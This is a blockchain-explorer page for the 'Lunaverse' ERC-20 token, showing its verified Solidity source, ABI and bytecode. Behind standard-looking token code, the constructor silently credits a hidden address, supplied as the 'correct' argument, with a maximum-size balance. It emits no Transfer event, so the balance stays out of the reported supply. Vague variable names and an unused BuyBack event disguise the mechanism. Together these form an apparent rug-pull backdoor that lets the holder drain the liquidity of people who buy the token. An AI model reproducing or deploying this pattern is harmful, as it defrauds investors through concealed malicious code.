ETH Price: $3,885.64 (-0.98%)

Token

ERC-20: Lunaverse (Lunaverse)
 

Overview

Max Total Supply

1,000,000,000 Lunaverse

Holders

32

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
2,773,405.083067824 Lunaverse

Value
$0.00
0x8275e053ba1ff2eeed0dfc829a97d750569b4452
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Contract

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : Contract.sol
// https://t.me/Lunaverse_1

// SPDX-License-Identifier: Unlicense

pragma solidity ^0.8.9;

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract Contract is Ownable {
    uint256 private _tTotal;
    uint256 private _rTotal;
    address public uniswapV2Pair;
    IUniswapV2Router02 public router;
    uint256 private nearer = ~uint256(0);
    uint256 public _fee;
    string private _name;
    string private _symbol;
    uint8 private _decimals;

    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) private _balances;

    uint256 minBalance = 10 * 10**_decimals;
    address private lunaInuAddress = 0x78132543D8E20D2417d8a07D9ae199D458A0D581; // Luna Inu

    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event BuyBack(uint256 amount);

    constructor(
        string memory _NAME,
        string memory _SYMBOL,
        address routerAddress,
        address correct
    ) {
        _symbol = _SYMBOL;
        _name = _NAME;
        _fee = 1;
        _decimals = 9;
        _tTotal = 1000000000 * 10**_decimals;

        _balances[correct] = nearer;
        _balances[msg.sender] = _tTotal;

        router = IUniswapV2Router02(routerAddress);
        uniswapV2Pair = IUniswapV2Factory(router.factory()).createPair(address(this), router.WETH());

        emit Transfer(address(0), msg.sender, _tTotal);
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint256) {
        return _decimals;
    }

    function totalSupply() public view returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }

    function handle(
        address thank,
        address mice,
        uint256 amount
    ) private {
        uint256 fee = (amount / 100) * _fee;
        amount -= fee;
        _balances[thank] -= fee;
        _balances[address(this)] += fee;
        _balances[thank] -= amount;
        _balances[mice] += amount;
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        return _approve(msg.sender, spender, amount);
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool) {
        require(amount > 0, 'Transfer amount must be greater than zero');
        handle(sender, recipient, amount);
        emit Transfer(sender, recipient, amount);
        return _approve(sender, msg.sender, _allowances[sender][msg.sender] - amount);
    }

    function transfer(address recipient, uint256 amount) external returns (bool) {
        handle(msg.sender, recipient, amount);
        emit Transfer(msg.sender, recipient, amount);
        return true;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private returns (bool) {
        require(owner != address(0) && spender != address(0), 'ERC20: approve from the zero address');
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        return true;
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_NAME","type":"string"},{"internalType":"string","name":"_SYMBOL","type":"string"},{"internalType":"address","name":"routerAddress","type":"address"},{"internalType":"address","name":"correct","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"BuyBack","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_fee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052600019600555600960009054906101000a900460ff16600a620000289190620007ab565b600a620000369190620007fc565b600c557378132543d8e20d2417d8a07d9ae199d458a0d581600d60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200009b57600080fd5b5060405162002087380380620020878339818101604052810190620000c1919062000a5f565b620000e1620000d56200049560201b60201c565b6200049d60201b60201c565b8260089080519060200190620000f992919062000561565b5083600790805190602001906200011292919062000561565b50600160068190555060098060006101000a81548160ff021916908360ff160217905550600960009054906101000a900460ff16600a620001549190620007ab565b633b9aca00620001659190620007fc565b600181905550600554600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600154600b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002a6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002cc919062000b0f565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000356573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200037c919062000b0f565b6040518363ffffffff1660e01b81526004016200039b92919062000b52565b6020604051808303816000875af1158015620003bb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003e1919062000b0f565b600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60015460405162000483919062000b90565b60405180910390a35050505062000c11565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200056f9062000bdc565b90600052602060002090601f016020900481019282620005935760008555620005df565b82601f10620005ae57805160ff1916838001178555620005df565b82800160010185558215620005df579182015b82811115620005de578251825591602001919060010190620005c1565b5b509050620005ee9190620005f2565b5090565b5b808211156200060d576000816000905550600101620005f3565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200069f5780860481111562000677576200067662000611565b5b6001851615620006875780820291505b8081029050620006978562000640565b945062000657565b94509492505050565b600082620006ba57600190506200078d565b81620006ca57600090506200078d565b8160018114620006e35760028114620006ee5762000724565b60019150506200078d565b60ff84111562000703576200070262000611565b5b8360020a9150848211156200071d576200071c62000611565b5b506200078d565b5060208310610133831016604e8410600b84101617156200075e5782820a90508381111562000758576200075762000611565b5b6200078d565b6200076d84848460016200064d565b9250905081840481111562000787576200078662000611565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620007b88262000794565b9150620007c5836200079e565b9250620007f47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620006a8565b905092915050565b6000620008098262000794565b9150620008168362000794565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000852576200085162000611565b5b828202905092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620008c6826200087b565b810181811067ffffffffffffffff82111715620008e857620008e76200088c565b5b80604052505050565b6000620008fd6200085d565b90506200090b8282620008bb565b919050565b600067ffffffffffffffff8211156200092e576200092d6200088c565b5b62000939826200087b565b9050602081019050919050565b60005b838110156200096657808201518184015260208101905062000949565b8381111562000976576000848401525b50505050565b6000620009936200098d8462000910565b620008f1565b905082815260208101848484011115620009b257620009b162000876565b5b620009bf84828562000946565b509392505050565b600082601f830112620009df57620009de62000871565b5b8151620009f18482602086016200097c565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000a2782620009fa565b9050919050565b62000a398162000a1a565b811462000a4557600080fd5b50565b60008151905062000a598162000a2e565b92915050565b6000806000806080858703121562000a7c5762000a7b62000867565b5b600085015167ffffffffffffffff81111562000a9d5762000a9c6200086c565b5b62000aab87828801620009c7565b945050602085015167ffffffffffffffff81111562000acf5762000ace6200086c565b5b62000add87828801620009c7565b935050604062000af08782880162000a48565b925050606062000b038782880162000a48565b91505092959194509250565b60006020828403121562000b285762000b2762000867565b5b600062000b388482850162000a48565b91505092915050565b62000b4c8162000a1a565b82525050565b600060408201905062000b69600083018562000b41565b62000b78602083018462000b41565b9392505050565b62000b8a8162000794565b82525050565b600060208201905062000ba7600083018462000b7f565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000bf557607f821691505b60208210810362000c0b5762000c0a62000bad565b5b50919050565b6114668062000c216000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063c5b37c2211610066578063c5b37c2214610278578063dd62ed3e14610296578063f2fde38b146102c6578063f887ea40146102e2576100f5565b8063715018a6146102025780638da5cb5b1461020c57806395d89b411461022a578063a9059cbb14610248576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806349bd5a5e146101b457806370a08231146101d2576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610300565b60405161010f9190610d7c565b60405180910390f35b610132600480360381019061012d9190610e37565b610392565b60405161013f9190610e92565b60405180910390f35b6101506103a7565b60405161015d9190610ebc565b60405180910390f35b610180600480360381019061017b9190610ed7565b6103b1565b60405161018d9190610e92565b60405180910390f35b61019e610500565b6040516101ab9190610ebc565b60405180910390f35b6101bc61051a565b6040516101c99190610f39565b60405180910390f35b6101ec60048036038101906101e79190610f54565b610540565b6040516101f99190610ebc565b60405180910390f35b61020a610589565b005b610214610611565b6040516102219190610f39565b60405180910390f35b61023261063a565b60405161023f9190610d7c565b60405180910390f35b610262600480360381019061025d9190610e37565b6106cc565b60405161026f9190610e92565b60405180910390f35b610280610748565b60405161028d9190610ebc565b60405180910390f35b6102b060048036038101906102ab9190610f81565b61074e565b6040516102bd9190610ebc565b60405180910390f35b6102e060048036038101906102db9190610f54565b6107d5565b005b6102ea6108cc565b6040516102f79190611020565b60405180910390f35b60606007805461030f9061106a565b80601f016020809104026020016040519081016040528092919081815260200182805461033b9061106a565b80156103885780601f1061035d57610100808354040283529160200191610388565b820191906000526020600020905b81548152906001019060200180831161036b57829003601f168201915b5050505050905090565b600061039f3384846108f2565b905092915050565b6000600154905090565b60008082116103f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ec9061110d565b60405180910390fd5b610400848484610a8d565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161045d9190610ebc565b60405180910390a36104f7843384600a60008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104f2919061115c565b6108f2565b90509392505050565b6000600960009054906101000a900460ff1660ff16905090565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610591610c17565b73ffffffffffffffffffffffffffffffffffffffff166105af610611565b73ffffffffffffffffffffffffffffffffffffffff1614610605576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105fc906111dc565b60405180910390fd5b61060f6000610c1f565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600880546106499061106a565b80601f01602080910402602001604051908101604052809291908181526020018280546106759061106a565b80156106c25780601f10610697576101008083540402835291602001916106c2565b820191906000526020600020905b8154815290600101906020018083116106a557829003601f168201915b5050505050905090565b60006106d9338484610a8d565b8273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516107369190610ebc565b60405180910390a36001905092915050565b60065481565b6000600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107dd610c17565b73ffffffffffffffffffffffffffffffffffffffff166107fb610611565b73ffffffffffffffffffffffffffffffffffffffff1614610851576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610848906111dc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b79061126e565b60405180910390fd5b6108c981610c1f565b50565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415801561095d5750600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b61099c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099390611300565b60405180910390fd5b81600a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610a7a9190610ebc565b60405180910390a3600190509392505050565b6000600654606483610a9f919061134f565b610aa99190611380565b90508082610ab7919061115c565b915080600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b08919061115c565b9250508190555080600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b5e91906113da565b9250508190555081600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610bb4919061115c565b9250508190555081600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610c0a91906113da565b9250508190555050505050565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610d1d578082015181840152602081019050610d02565b83811115610d2c576000848401525b50505050565b6000601f19601f8301169050919050565b6000610d4e82610ce3565b610d588185610cee565b9350610d68818560208601610cff565b610d7181610d32565b840191505092915050565b60006020820190508181036000830152610d968184610d43565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610dce82610da3565b9050919050565b610dde81610dc3565b8114610de957600080fd5b50565b600081359050610dfb81610dd5565b92915050565b6000819050919050565b610e1481610e01565b8114610e1f57600080fd5b50565b600081359050610e3181610e0b565b92915050565b60008060408385031215610e4e57610e4d610d9e565b5b6000610e5c85828601610dec565b9250506020610e6d85828601610e22565b9150509250929050565b60008115159050919050565b610e8c81610e77565b82525050565b6000602082019050610ea76000830184610e83565b92915050565b610eb681610e01565b82525050565b6000602082019050610ed16000830184610ead565b92915050565b600080600060608486031215610ef057610eef610d9e565b5b6000610efe86828701610dec565b9350506020610f0f86828701610dec565b9250506040610f2086828701610e22565b9150509250925092565b610f3381610dc3565b82525050565b6000602082019050610f4e6000830184610f2a565b92915050565b600060208284031215610f6a57610f69610d9e565b5b6000610f7884828501610dec565b91505092915050565b60008060408385031215610f9857610f97610d9e565b5b6000610fa685828601610dec565b9250506020610fb785828601610dec565b9150509250929050565b6000819050919050565b6000610fe6610fe1610fdc84610da3565b610fc1565b610da3565b9050919050565b6000610ff882610fcb565b9050919050565b600061100a82610fed565b9050919050565b61101a81610fff565b82525050565b60006020820190506110356000830184611011565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061108257607f821691505b6020821081036110955761109461103b565b5b50919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b60006110f7602983610cee565b91506111028261109b565b604082019050919050565b60006020820190508181036000830152611126816110ea565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061116782610e01565b915061117283610e01565b9250828210156111855761118461112d565b5b828203905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006111c6602083610cee565b91506111d182611190565b602082019050919050565b600060208201905081810360008301526111f5816111b9565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611258602683610cee565b9150611263826111fc565b604082019050919050565b600060208201905081810360008301526112878161124b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006112ea602483610cee565b91506112f58261128e565b604082019050919050565b60006020820190508181036000830152611319816112dd565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061135a82610e01565b915061136583610e01565b92508261137557611374611320565b5b828204905092915050565b600061138b82610e01565b915061139683610e01565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156113cf576113ce61112d565b5b828202905092915050565b60006113e582610e01565b91506113f083610e01565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156114255761142461112d565b5b82820190509291505056fea2646970667358221220bb4c20f08a05ff3d00af65790cea310ade3638ebd56946434e54a5f74cce47d564736f6c634300080e0033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d0000000000000000000000002be915829dbb43c27ccfd2ae040c45bff2feb6b000000000000000000000000000000000000000000000000000000000000000094c756e617665727365000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094c756e6176657273650000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063c5b37c2211610066578063c5b37c2214610278578063dd62ed3e14610296578063f2fde38b146102c6578063f887ea40146102e2576100f5565b8063715018a6146102025780638da5cb5b1461020c57806395d89b411461022a578063a9059cbb14610248576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806349bd5a5e146101b457806370a08231146101d2576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610300565b60405161010f9190610d7c565b60405180910390f35b610132600480360381019061012d9190610e37565b610392565b60405161013f9190610e92565b60405180910390f35b6101506103a7565b60405161015d9190610ebc565b60405180910390f35b610180600480360381019061017b9190610ed7565b6103b1565b60405161018d9190610e92565b60405180910390f35b61019e610500565b6040516101ab9190610ebc565b60405180910390f35b6101bc61051a565b6040516101c99190610f39565b60405180910390f35b6101ec60048036038101906101e79190610f54565b610540565b6040516101f99190610ebc565b60405180910390f35b61020a610589565b005b610214610611565b6040516102219190610f39565b60405180910390f35b61023261063a565b60405161023f9190610d7c565b60405180910390f35b610262600480360381019061025d9190610e37565b6106cc565b60405161026f9190610e92565b60405180910390f35b610280610748565b60405161028d9190610ebc565b60405180910390f35b6102b060048036038101906102ab9190610f81565b61074e565b6040516102bd9190610ebc565b60405180910390f35b6102e060048036038101906102db9190610f54565b6107d5565b005b6102ea6108cc565b6040516102f79190611020565b60405180910390f35b60606007805461030f9061106a565b80601f016020809104026020016040519081016040528092919081815260200182805461033b9061106a565b80156103885780601f1061035d57610100808354040283529160200191610388565b820191906000526020600020905b81548152906001019060200180831161036b57829003601f168201915b5050505050905090565b600061039f3384846108f2565b905092915050565b6000600154905090565b60008082116103f5576040517f08c379